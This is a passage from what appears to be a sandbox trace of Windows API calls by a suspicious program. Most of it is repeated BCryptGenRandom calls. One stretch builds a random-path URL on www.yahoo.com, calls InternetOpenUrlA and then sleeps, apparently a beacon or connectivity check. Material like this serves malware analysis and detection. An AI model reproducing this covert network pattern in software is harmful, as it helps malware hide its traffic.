(in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.213] GetProcessHeap () returned 0x440000 [0174.213] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0174.213] lstrcpyA (in: lpString1=0x4741c0, lpString2="®ùå…s://www.yahoo.com" | out: lpString1="®ùå…s://www.yahoo.com") returned="®ùå…s://www.yahoo.com" [0174.213] lstrcatA (in: lpString1="®ùå…s://www.yahoo.com", lpString2="/0d6solpd9lckn6aE3jiws16/3cnv5g1OZ7bi8PlQzeqdO3hQcrgpD9njz7uhTcj58ybfP1/" | out: lpString1="®ùå…s://www.yahoo.com/0d6solpd9lckn6aE3jiws16/3cnv5g1OZ7bi8PlQzeqdO3hQcrgpD9njz7uhTcj58ybfP1/") returned="®ùå…s://www.yahoo.com/0d6solpd9lckn6aE3jiws16/3cnv5g1OZ7bi8PlQzeqdO3hQcrgpD9njz7uhTcj58ybfP1/" [0174.213] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0174.213] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="®ùå…s://www.yahoo.com/0d6solpd9lckn6aE3jiws16/3cnv5g1OZ7bi8PlQzeqdO3hQcrgpD9njz7uhTcj58ybfP1/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0174.213] GetProcessHeap () returned 0x440000 [0174.213] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0174.213] GetProcessHeap () returned 0x440000 [0174.214] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0174.214] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0174.214] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0174.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0174.214] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0174.214] Sleep (dwMilliseconds=0x12e49) [0174.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0174.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.403] GetProcessHeap () returned 0x440000 [0174.403] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02150 [0174.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02151, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a02151) returned 0x0 [0174.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0217f, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a0217f) returned 0x0 [0174.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, 